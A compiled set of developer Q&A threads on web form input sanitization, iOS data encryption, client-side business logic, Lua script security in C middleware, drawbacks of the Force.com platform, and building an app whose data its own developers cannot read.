How do you protect against malicious code in web forms? - database

I understand this is probably going to sound like an extremely rudimentary question to some of the more senior people on here but, I had to ask. I understand Google is there for my use but, I wanted to make sure I found the right answer. My friend is concerned that when we post a coming soon page for our project that someone could post malicious code into our web form (username, dob, email, contact information sort of web form) and he wants to know what's the best way to protect against such malicious code injections.
Do you just get SSL protection on your database or is there something more programming intensive we need to produce to protect ourselves and the information we collect?

You sanitize your inputs before storing them, which generally means e.g. escaping special characters in sql or whatever before building a query.
Pretty much every language and platform for building web applications provides ways for you to do this. Typically you'll use whatever version of parameterized queries your infrastructure provides and it will handle escaping for you. But "sanitizing inputs" is the Google keyword here.
This has nothing to do with ssl at all. Ssl encrypts network traffic so third parties can't spy on it. The use of ssl is completely independent of your sites susceptibility to code injection attacks.
I would go into more detail about sanitizing inputs but without more information there's not much I can say, and also info about this is readily available in docs, tutorials, and examples all over the Internet.

Related

How to properly encrypt information using Core Data

I'm developing an app that manages sensitive information. For this reason I would like to give the user the option of creating a password to encrypt the data. This information is only to be saved in the device; the idea is not to encrypt and send the data through a network, but to prevent other people with total access to the device to have access to it.
Now, what I don't know is if I should encrypt the whole data base or encrypt only each entry before saving it. What is the recommended approach to encrypt data bases?
Diego,
Encrypting data is a subtle problem.
First, do the easy stuff. Turn on Apple's file security. That will probably give you more security for less effort than anything you can write. It probably provides all of the security you really need on the device. If it doesn't, you should know exactly what it doesn't provide. That would be the main cause for writing special purpose code. Apple recently posted an excellent white paper on iOS security. We all should read it.
Second, security is broken in subtle and non-obvious ways. It just isn't a matter of firing up the encryption and then hoping for the best. How are you going to handle key distribution to other devices? How are you going to handle lost keys? Do you trust Apple's keychain? (Have they fixed their process in the wake of "goto fail;"?)
The way most security folks I know handle these issues is by building detailed scenarios of use. And then implementing code to see if the design is any good. Then asking their friends and consultants to poke holes in the design; fix the holes until you have "confidence" in your design. If you are new to security, and by the nature of your question I assume you are relatively new to the field, then you should NOT have confidence in your design. You now need to reimplement your design with simpler code and simpler processes. Then put it in front of real users. They will show you how your security process fails in real hands. Bad security design has killed many products and it can kill yours.
I would be very careful. Use what Apple has already carefully engineered. Seriously ask yourself if you need more than that. Ask your management how much they want to spend on security? Ask your users how important the bother of security is for them? I suspect the answer to both questions is: no, they do not want to pay for or bother with security.
As a result, do the simple stuff: use Apple's iOS security.
Anon,
Andrew

angularjs business logic

In Angularjs it is possible to use a restful server api just to store the objects with all the business logic embedded in Javascript. Most of the examples seems to point in that direction.
Is this not bad practice both in terms of maintainability and security?
This question is a little vague, but I'll try to give a broad answer: I do not feel it is bad practice to migrate logic to the client side.
Maintainability
Heavens no! I started my career on the backend and I can say with a high degree of confidence that whether the code is on the front or on the back has no weight on its maintainability; code is code. Whether we place it in a reusable service component on the client or a reusable library on the server, change management is very similar. See the security section for an important additional note.
Business Logic
Honestly, I've never understood why developers are so reticent when it comes to their business logic. It's as if in their minds if only someone were to reverse engineer their code, they would discover some magical reality of which they had never conceived - they would be witness to the developer's genius! - and would now be sufficiently armed to commit some act of market aggression.
This is absurd. They can see your service; they can see your user interface; they know the goal. If they want to replicate you, they already can. It's incredibly rare that it is our business logic that is the key to our products. It's just not a concern in 99% of cases.
And any massively complex algorithm at the center of business wouldn't end up on the client anyway, right? We do the heavily lifting on our distributed file stores with map/reduce operations and semantic graphs...
Security
This is an important consideration as always, but the key is in the REST API. The REST API is the official gateway that cannot be tampered with. If our user model requires a first_name field, it is the REST API's job to ensure that field is there. We probably also introduce checks on the client-side, but these are almost always created with user experience in mind: synchronous and instant feedback is better than asynchronous and delayed feedback.
Anything related to security, strictly defined, is on the server. Authentication and authorization are obviously on the server. They're never on the client. So we're not introducing any vulnerabilities by choosing the single-page application paradigm. Just think about Twitter, or Google products, or Facebook - they all have open APIs that we can use in lieu of the web interface to accomplish the same goals. The APIs enforce the key rules, they ensure proper security, but they leave user experience up to the client.
Obviously, this implies that some logic is duplicated on the client and server, like basic validation. Sure. But we do it for user experience. It introduces a little bit more complexity into our change management processes, but it's far outweighed by the user experience gains.

Middleware: Using C as the engine, Lua for Adapters...is this bad practice (Security risk)?

I am an integration consultant and tend to use C and Lua in my spare time, unfortunately it is not my day job ;-(
Anyway, I tend to believe that a mixture of C and Lua is perfect for many "product" developments. I currently have an "adapter engine" built in pure C, but would like to actually move the adapter code to Lua....
For example, coding an EMAIL adapter in Lua is far easier than in C...yet I like the "engine speed of C"....
But now there is the big question of security risk in that the user can potentially add whatever he or she wants to the LUa scripts in production.....obviously there we could CHMOD the files...but is that really secure?
Ideally I want the C / Lua combination here....but now do I literally imbed the Lua code in the C application with a CHAR*....or do I issue a lua_dofile??
Thanks for the help
Lynton
First, one of the drawbacks to using C/Lua in production is it tends to be harder to find resources who can develop for these languages. C++ and JavaScript programmers are typically easier to find.
In terms of security, the key here is to use leading practices. Security is about risk reduction, there is no expectation one can achieve perfect security so you need to mitigate risk.
Here are my suggestions:
As with all middleware you need to use a hardened server. This is the first step, if the server is compromised using any platform you are in trouble. Middleware should NOT be in the DMZ.
You want to store the Lua code external to the compiled code (otherwise you lose the advantage of using Lua.) Make that storage as secure as you can. CHMOD is good, a secure DB server is better. The more secure the script store the more secure the system.
You can encrypt the Lua source - this is a trade off since it makes it a little harder to gain the advantage of easy updates and modification. You will probably need to implement decrypted script caching for performance.
Your security is as strong as your weakest link. If you provide a way to modify the Lua source via external access this will be an attack vector. Avoid this design if you can.
You should consider putting in change management checks. For example a separate place in the system where a checksum for each Lua file is stored. Then if an un-authorized change is made to a script you can abort functioning till the security breach is mitigated.
Other than the drawback I mentioned above, I don't think there is anything fundamentally flawed in your plan. If it can aid in making a good middleware system I would say go for it. Just mitigate the risk of your adapter scripts getting compromised as much as possible.
To expand on Donal's comment - given the popularity of node I would say that JavaScript is the the leading practice in scripted middleware right now. If you can handle learning a new scripting language I would say it would be a good idea given the support, popularity, and tools available.
Your primary requirement in terms of security is to ensure that the server cannot evaluate anything send by clients by any mechanism (not just direct evaluation, but also through supplying filenames). A lesser requirement is that they should also not have any mechanism to produce a message that allows other clients to evaluate unexpected things (i.e., avoid XSS trouble). If you can satisfy these requirements, you've got a safe server and the language(s) that it written in won't matter; using multiple languages is in fact a good idea as it lets you leverage the best of each.
It's also a good idea to use a carefully configured firewall, plenty of privilege restriction, some kind of DMZ proxy system to at least verify basic syntactic legality of messages, etc. These things are all just good practice. (Aim to configure things so the server can only just manage to do the service you want to provide.)
With sending email, there are a few other things to beware of. In particular, you do not want to be a conduit for spam, so you need to take care to ensure that arbitrary email headers cannot be constructed from client input and that the data formats you send out are non-executable (or that the data is constructed in a way that is non-evil). Rate limiting is also a good idea; unless your site is insanely popular, you shouldn't need to send more than a few messages a second across all clients. If you're ever sending only to a small set of addresses (e.g., to a fixed contact address) then you can relax these restrictions a bit (but still be careful of header injection). In all cases, route all email by a specialist email handling server instead of doing routing yourself as this avoids a whole lot of configuration difficulties.

Disadvantages of the Force.com platform [closed]

As it currently stands, this question is not a good fit for our Q&A format. We expect answers to be supported by facts, references, or expertise, but this question will likely solicit debate, arguments, polling, or extended discussion. If you feel that this question can be improved and possibly reopened, visit the help center for guidance.
Closed 10 years ago.
We're currently looking at using the Force.com platform as our development platform and the sales guys and the force.com website are full of reasons why it's the best platform in the world. What I'm looking for, though, is some real disadvantages to using such a platform.
Here are 10 to get you started.
Apex is a proprietary language. Other than the force.com Eclipse plugin, there's little to no tooling available such as refactoring, code analysis, etc.
Apex was modeled on Java 5, which is considered to be lagging behind other languages, and without tooling (see #1), can be quite cumbersome.
Deployment is still fairly manual with lots of gotchas and manual steps. This situation is slowly improving over time, but you'll be disappointed if you're used to having automated deployments.
Apex lacks packages/namespaces. All of your classes, interfaces, etc. live in one folder on the server. This makes code much less organized and class/interface names necessarily long to avoid name clashes and to provide context. This is one of my biggest complaints, and I would not freely choose to build on force.com for this reason alone.
The "force.com IDE", aka force.com eclipse plugin, is incredibly slow. Saving any file, whether it be a class file, text file, etc., usually takes at least 5 seconds and sometimes up to 30 seconds depending on how many objects, data types, class files, etc. are in your org. Saving is also a blocking action, requiring not only compilation, but a full sync of your local project with the server. Orders of magnitude slower than Java or .NET.
The online developer community does not seem very healthy. I've noticed lots of forum posts go unanswered or unsolved. I think this may have something to do with the forum software salesforce.com uses, which seems to suck pretty hard.
The data access DSL in Apex leaves a lot to be desired. It's not even remotely competitive with the likes of (N)Hibernate, JPA, etc.
Developing an app on Apex/VisualForce is an exercise in governor limits engineering. Easily half of programmer time is spent trying to optimize to avoid the numerous governor limits and other gotchas like visualforce view state limits. It could be argued that if you write efficient code to begin with you won't have this problem, which is true to an extent. However there are many times that you have valid reasons to make more than x queries in a session, or loop through more than x records, etc.
The save->compile->run cycle is extremely slow, esp. when it involves zipping and uploading the entire static resource bundle just to do something like test a minor CSS or javascript change.
In general, the pain of a young, fledgling platform without the benefits of it being open source. You have no way to validate and/or fix bugs in the platform. They say to post it to their IdeaExchange. Yeah, good luck with that.
Disclaimers/Disclosures: There are lots of benefits to a hosted platform such as force.com. Force.com does regularly enhance the platform. There are plenty of things about it I like. I make money building on force.com
I see you've gotten some answers, but I would like to reiterate how much time is wasted getting around the various governor limits on the platform. As much as I like the platform on certain levels, I would very strongly, highly, emphatically recommend against it as a general application development platform. It's great as a super configurable and extensible CRM application if that's what you want. While their marketing is exceptional at pushing the idea of Force.com as a general development platform, it's not even remotely close yet.
The efficiency of having a stable platform and avoiding big performance and stability problems is easily wasted in trying to code around the limits that people refer to. There are so many limits to the platform, it becomes completely maddening. These limits are not high-end limits you'll hit once you have a lot of users, you'll hit them almost right away.
While there are usually techniques to get around them, it's very hard to figure out strategies for avoiding them while you're also trying to develop the business logic of your actual application.
To give you a simple sense of how developer un-friendly the environment is, take the "lack of debugging environment" referred to above. It's worse than that. You can only see up to 20 of the most recent requests to the server in the debug logs. So, as you're developing inside the application you have to create a "New" debug request, select your name, hit "Save", switch back to your app, refresh the page, click back to your debug tab, try to find the request that will house your debug log, hit "find" to search for the text you're looking for. It's like ten clicks to look at a debug output. While it may seem trivial, it's just an example of how little care and consideration has been given to the developer's experience.
Everything about the development platform is a grafted-on afterthought. It's remarkable for what it is, but a total PITA for the most part. If you don't know exactly what you are doing (as in you're certified and have a very intimate understanding of Apex), it will easily take you upwards of 10-20x the amount of time that it would in another environment to do something that seems like it would be ridiculously simple, if you can even succeed at all.
The governor limits are indeed that bad. You have a combination of various limits (database queries, rows returned, "script statements", future calls, callouts, etc.) and you have to know exactly what you are doing to avoid these. For example, if you have a calculated rollup "formula" field on an object and you have a trigger on a child object, it will execute the parent object triggers and count those against your limits. Things like that aren't obvious until you've gone through the painful process of trying and failing.
You'll try one thing to avoid one limit, and hit another in a never ending game of "whack a limit". In the process you'll have to drastically re-architect your entire app and approach, as well as rewrite all of your test code. You must have 75% test code coverage to deploy into production, which is actually very good thing, but combined with all of the other limits, it's very burdensome. You'll actually hit governor limits writing your test code that wouldn't come up in normal user scenarios, but that will prevent you from achieving the coverage.
That is not to mention a whole host of other issues. Packaging isn't what you expect. You can't package up your app and deliver it to users without significant user intervention and configuration on the part of the administrator of the org. The AppExchange is a total joke, and they've even started charging 5K just to get your app listed. Importing with the data loader sucks, especially if you have any triggers. You can't export all of your data in one step that includes your relationships in such a way that it can easily be re-imported into another org in a single step (for example a dev org). You can only refresh a sandbox once a month from production, no exceptions, and you can't include your data in a refresh by default unless you have called your account executive to get that feature unlocked. You can't mass delete data in custom objects. You can't change your package names. Certain things can take numerous days to complete after you have requested them, such as a data backup before you want to deploy an app, with no progress report along the way and not much sense of when exactly the export occurred. Given that there are synchronicity issues of data if there are relationships between the data, there are serious data integrity issues in that there is no such thing as a "transaction" that can export numerous objects in a single step. There are probably some commercial tools to facilitate some of this, but these are not within reach to normal developers who may not have a huge budget.
Everything else the other people said here is true. It can take anywhere from five seconds to a minute sometimes to save a file.
I don't mean to be so negative because the platform is very cool in some ways and they're trying to do things in a multi-tenant environment that no one else is doing. It's a very innovative environment and powerful on some levels (I actually like VisualForce a lot), but give it another year or two. They're partnering with VMware, maybe that will lead to giving developers a bit more of a playpen rather than a jail cell to work in.
Here are a few things I can give you after spending a fair bit of time developing on the platform in the last fortnight or so:
There's no RESTful API. They have a soap based API that you can call, but there is no way of making true restful calls
There's no simple way to take their SObjects and convert them to JSON objects.
The visual force pages are ok until you want to customize them and then it's a whole world of pain.
Visual force pages need to be bound to SObjects otherwise there's no way to get the standard input fields like the datepicker or select list to work.
The eclipse plugin is ok if you want to work by yourself, but if you want to work in a large team with the eclipse plugin forget it. It doesn't handle synchronizing to and from the server, it crashes and it isn't really helpful at all.
THERE IS NO DEBUGGER! If you want to debug, it's literally debugged by system.debug statements. This is probably the biggest problem I've found
Their "MVC" model isn't really MVC. It's a lot closer to ASP.NET Webforms. Your views are tightly coupled to not only the models but the controllers as well.
Storing a large number of documents is not feasible. We need to store over 100gb's of documents and we were quoted some ridiculous figure. We've decided to implement our document storage on amazons S3 infrastructure
Even tho the language is java based, it's not java. You can't import any external packages or libraries. Also, the base libraries that are available are severely limited so we've found ourselves implementing a bunch of stuff externally and then exposing those bits as services that are called by force.com
You can call external SOAP or REST based services but the message body is limited to 100kb's so it's very restrictive in what you can call.
In all honesty, whilst there are potential benefits to developing on something like the force.com platform, for me, you couldn't use the force.com platform for true enterprise level apps. At best you could write some basic crud style applications but once you move into anything remotely complicated I'd be avoiding it like the plague.
Wow- there's a lot here that I didn't even know were limitations - after working on the platform for a few years.
But just to add some other things...
The reason you don't have a line-by-line debugger is precisely because it's a multi-tenant platform. At least that's what SFDC says - it seems like in this age of thread-rich programming, that isn't much of an excuse, but that's apparently the reason. If you have to write code, you have "System.debug(String)" as your debugger - I remember having more sophisticated server debugging tools in Java 1.2 about 12 years ago.
Another thing I really hate about the system is version control. The Spring framework is not used for what Spring is usually used for - it's really more off a configuration tool in SFDC rather than version control. SFDC provides ZERO version-control.
You can find yourself stuck for days doing something that should seem so ridiculously easy, like, say, scheduling a SFDC report to export to a CSV file and email to a list of recipients... Well, about the easiest way to do that is create a custom object with a custom field, with a workflow rule and a Visualforce email template... and then for code you need to write a Visualforce component that streams the report data to the Visualforce email template as an attachment and you write anonymous APEX code schedule field-update of the custom object... For SFDC developers, this is almost a daily task... trying to put about five different technologies together to do tasks that seem so simple.... And this can cause management headaches and tensions too - Typically, you'd find this out after getting a suggestion to do something that doesn't work in the user-community (like someone already said), and then trying many things that, after you developed them you'd find they just don't work for some odd-ball reason - like "you can't schedule a VisualForce page", or "you can't call getContent from a schedulable context" or some other arcane reason.
There are so many, many maddening little gotcha's on the SFDC platform, that once you know WHY they're there, it makes sense... but they're still very bad limitations that keep you from doing what you need to do. Here's some of mine;
You can't get record owner information "out of the box" on pretty much any kind of record - you have to write a trigger that links the owner on create of the record to the record you're inserting. Why? Short answer because an owner can be either a "person" or a "queue", and the two are drastically different entities... Makes sense, but it can turn a project literally upside down.
Maddening security model. Example: "Manage Public Reports" permission is vastly different from "Create and Customize Reports" and that basically goes for everything on the platform... especially folders of any kind.
As mentioned, support is basically non-existent. If you are an extremely self-sufficient individual, or have a lot of SFDC resources, or have a lot of time and/or a very forgiving manager, or are in charge of a SFDC system that's working fine, you're in pretty good shape. If you are not in any of these positions, you can find yourself in deep trouble.
SFDC is a very seductive business proposition... no equipment footprint, pretty good security, fixed price, no infrastructure, AND you get web-based CRM with batchable, and schedualble processing... But as the other posters said, it is really quite a ramp-up in development learning, and if you go with consulting, I think the lowest price I've seen was $200/hour.
Salesforce tends integrate with other things years after some technologies become common-place - JSON and jquery come to mind... and if you have other common infrastructures that you want to do an integration with, like JIRA, expect to pay a lot extra, and they can be quite buggy.
And as one of the other posters mentioned, you are constantly fighting governor limits that can just drive you nuts... an attachment can NOT be > 5MB. Period. And sometimes < 3MB (if base64 encoded). Ten HTTP callouts in a class. Period. There are dozens of published governor limits, and many that are not which you will undoubtedly find and just want to run out of your office screaming.
I really, REALLY like the platform, but trust me - it can be one really cruel mistress.
But in fairness to SFDC, I'd say this: the biggest problem I find with the platform is not the platform itself, but the gargantuan expectations that almost anyone who sees the platform, but hasn't developed on it has.... and those people tend to be in positions of great authority in business organizations; marketing, sales, management, etc. Huge disconnects occur and heads roll, or are threatened to roll daily - all because there's this great platform out there with weird gotchas and thousands of people struggling daily to get their heads around why things should just work when they just don't and won't.
EDIT:
Just to add to lomaxx's comments about the MVC; In SFDC terminology, this is closely related to what's known as the "viewstate" -- aand it can be really buggy, in that what is on the VF page is not what is in the controller-class for the page. So, you have to go throught weird gyrations to synch whats on the page with what the controller is going to write to SF when you click your "save" button (or make your HTTP callout or whatever).... man, it's annoying.
I think other people have covered the disadvantages in more depth but to me, it doesn't seem to use the MVC paradigm or support much in the way of code reuse at all. To do anything beyond simple applications is an exercise in frustration compared to developing an application using something like ASP.Net MVC.
Furthermore, the tools, the data layer and the frustration of trying to refactor code or rename fields during the development process doesn't help.
I think as a CMS it's pretty cool but as a platform for non CMS applications, it's doesn't make sense to me.
The security model is also very very restrictive... but this isn't the worst part. You can't currently assert whether a user has the ability to perform a particular action.
You can check to see what their role is, but you can't check if that role has permissions to perform the current action.
Even worse is the response from tech support to "try the action and if there's an exception, catch it"
Considering Force.com is a "cloud" platform, its ability to act as a client to an external WSDL-defined service is pretty underwhelming. See http://force201.wordpress.com/2010/05/20/when-generate-from-wsdl-fails-hand-coding-web-service-calls/ for what you might end up having to do.
To all above, I am curious how the release of VMforce, allowing Java programmer to write code for Force.com, changes the disadvantages above?
http://www.zdnet.com/blog/saas/vmforcecom-redefines-the-paas-landscape/1071
I guess they are trying to address these issues. At dreamforce they mentioned they we're trying to drop the Governor limits to only 4. I'm not sure what the details are. They have a REST API for early access, and they bought heroku which is a ruby development in the cloud. They split out the database, with database.com so you can do all your web development on and your db calls using database.com.
I guess they are trying to make it as agnostic as possible. But right about now these are all announcements and early access so like their Safe Harbor statements don't purchase on what they say, only on what they currently have.

How do I create a web application where I do not have access to the data?

Premise: The requirements for an upcoming project include the fact that no one except for authorized users have access to certain data. This is usually fine, but this circumstance is not usual. The requirements state that there be no way for even the programmer or any other IT employee be able to access this information. (They want me to store it without being able to see it, ever.)
In all of the scenarios I've come up with, I can always find a way to access the data. Let me describe some of them.
Scenario I: Restrict the table on the live database so that only the SQL Admin can access it directly.
Hack 1: I rollout a change that sends the data to a different table for later viewing. Also, the SQL Admin can see the data, which breaks the requirement.
Scenario II: Encrypt the data so that it requires a password to decrypt. This password would be known by the users only. It would be required each time a new record is created as well as each time the data from an old record was retrieved. The encryption/decryption would happen in JavaScript so that the password would never be sent to the server, where it could be logged or sniffed.
Hack II: Rollout a change that logs keypresses in javascript and posts them back to the server so that I can retrieve the password. Or, rollout a change that simply stores the unecrypted data in a hidden field that can be posted to the server for later viewing.
Scenario III: Do the same as Scenario II, except that the encryption/decryption happens on a website that we do not control. This magic website would allow a user to input a password and the encrypted or plain-text data, then use javascript to decrypt or encrypt that data. Then, the user could just copy the encrypted text and put the in the field for new records. They would also have to use this site to see the plain-text for old records.
Hack III: Besides installing a full-fledged key logger on their system, I don't know how to break this one.
So, Scenario III looks promising, but it's cumbersome for the users. Are there any other possibilities that I may be overlooking?
If you can have javascript on the page, then I don't think there's anything you can do. If you can see it in a browser, then that means it's in the DOM, which means you can write a script to get it and send it to you after it has been decrypted.
Aren't these problems usually solved via controls:
All programmers need a certain level of clearance and background checks
They are trained to understand that rolling out code to access the data is a fireable or worse offense
Every change in certain areas needs some kind of signoff
For example -- no JavaScript on page without signoff.
If you are allowed to add any code you want, then there's always a way, IMO.
Ask the client to provide an Non-disclosure Agreement for you to sign, sign it, then look at as much data as you want.
What I'm wondering is, what exactly will you be able to do with encrypted data anyway? Pretty-much all apps require you to do some filtering of the data, whether it be move it to a required place, modify it, sanitize it, or display it. Otherwise, you're just a glorified pipe, and you don't have to do any work.
The only way I can think of where you wouldn't be looking at the data or doing anything with it would be a simple form to table mapping with CRUD options. If you know what format the data will be coming in as you should be able to roll something out with RoR, a simple skin, put SSL into the mix, and roll it out. Test with dummy data in the same format, and you're set.
In fact, is your client unable to supply dummy data for testing? If they can, then your life is simple as all you do is provide an "installable" and tell them how to edit a config file.
I think you could still create the app in the following way:
Create a dev database and set up a user for it.
Ask them for: the data type, size, and name of each field that needs to be on the screen.
Set up the screens, create columns in the database that accept the data type and size they specify.
Deploy the app to production, hooked up to an empty database. Get someone with permission (not you) to go in and set the password on the database user and set the password for the DB user in the web app.
Authorized users can then do whatever they want and you never saw what any of the data looked like.
Of course, maintaining the app and debugging is gonna be a bitch!
--In answer to comments:
Ok, so after setting up the password for the Username in the database and in the web app's config, write a program that connects to the database, sets a randomized password, then writes that same randomized password to the web config.
Prevent any outgoing packets from the machine except to a set of authorized workstations - so you can't install your spyware.
Then set the Admin password on both servers to the same random password, then delete all other users on the servers, delete the program, and delete the program source code.
Wipe the hard drives of the developer machines with the DOD algorithm, and then toss them into an industrial shredder.
10. If the server ever needs debugging, toss it in the trash, buy a new one, and start back at #1.
But seriously - this is an insolvable problem. The best answer to this really is:
Tell them they can't have an application. Write your stuff on paper. Put it in a folder. Lock it in a vault. Thrust, repeat.
Wouldn't scenario 3 just expose all the data to the magic website? This doesn't sound like a solvable problem (at least I can't think of a solution).
Go with whatever solution is easiest for you to implement, I think the requirements show the the client does not understand software development and so it should be easy to sell any approach you take.
I have to say I really don't like the idea of using JavaScript on the client to decrypt the data. That is a huge hole as any script (hacker, GreaseMonkey, IE7Pro, etc.) can access the DOM and get data out of the page.
Also, it is very hard to get around the problem of key stroke loggers. If you throw those into the mix, then your options are limited. At that point you need a security FOB such as RSA (commonly used with corporate VPNs) to generate truly random PINs. That will probably be expensive, and it is a pain, and I have only seen it used with VPNs but I assume it could work with websites as well.
As far as the website, I'd stick with HTTPS and find a way to encrypt/decrypt through the WebServer rather than relying on JavaScript. The SSL traffic isn't very prone to sniffing (very difficult to decrypt), so that allows the encryption and decryption to happen server-side which (IMHO) is more secure.
Look at banking scenarios and other financial institutions for a starting point, and then go from there. Try not to over-complicate if possible.
You can't guarantee against hacking into the data as long as you have access to the server it lives on. So tell the employer they have to host the data somewhere else and grant access to the client's browser via a secure HTTPS connection.
You can design your web page to dynamically load an XML data stream securely, and format it into a web page using an XSLT script on the client.
See http://www.w3schools.com/xsl/xsl_client.asp for examples
That way you produce the code, but you never have access to the data. Only the user has access to their own data.
As for how the employer is going to host the data without granting any IT people access to it, that's their problem. It's a foolish requirement.
I think that I'll just tell them that they either have to trust a couple of us to have access (and not look at it) or they don't get a project.
Thanks for the answers. Feel free to post more thoughts if you have them.
You can never have 100% security, and extra security comes at a cost of speed/price/convenience etc.
Let's suppose you take scenario 3 - one of your programmers can use social engineering to get the password from one of the users. Goodbye security.
There's no point having a high-security iron door as a gate if people can just walk around it. Just implement a decent level of security.
(They want me to store it without being able to see it, ever.)
Hey, the recording industry wants people to be able to listen to their music, but not copy it. Sounds like they should get together sometime!
Their idea won't work for the same reason DRM doesn't work: the trust chain is inherently compromised. Encryption examples often use Alice, Bob, and Charlie where Alice is trying to communicate with Bob without Charlie listening in. With DRM, the trust chain is compromised because Bob and Charlie are the same person. With your situation, Charlie is the guy writing the software that Alice and Bob use to communicate. There's an implied trust, because if you don't trust Charlie then you can't trust Charlie's software, either.
That's the root of the issue: trust. If they can't trust the programmer, the game is over before it starts.
There are lots of options based on what their goal really is, but I am confused by their paranoia, er, intent:
Is this their (and end-user) data that they wish to keep private or end-user data to be kept private from everyone?
Is it just that your (or any contracted) company is suspect?
Are they afraid of over-the-wire snooping?
Are they afraid of DOM access through JavaScript or browser plugins?
Are they planning staged deployment? In that case you work on test/dev server w/o real data but have no access to the production server with the real data, and DNS logging and/or firewall rules inhibit all of your hacks from working undetected.
Ultimately if the data is stored in a DB then the programmer and DB admin can, by working together, get it. Period. A good audit should uncover that, though.
If this is truly a requirement, the only way to guard against this is to hire an outside firm to audit the code prior to releasing the software, and that's going to be very expensive.

Resources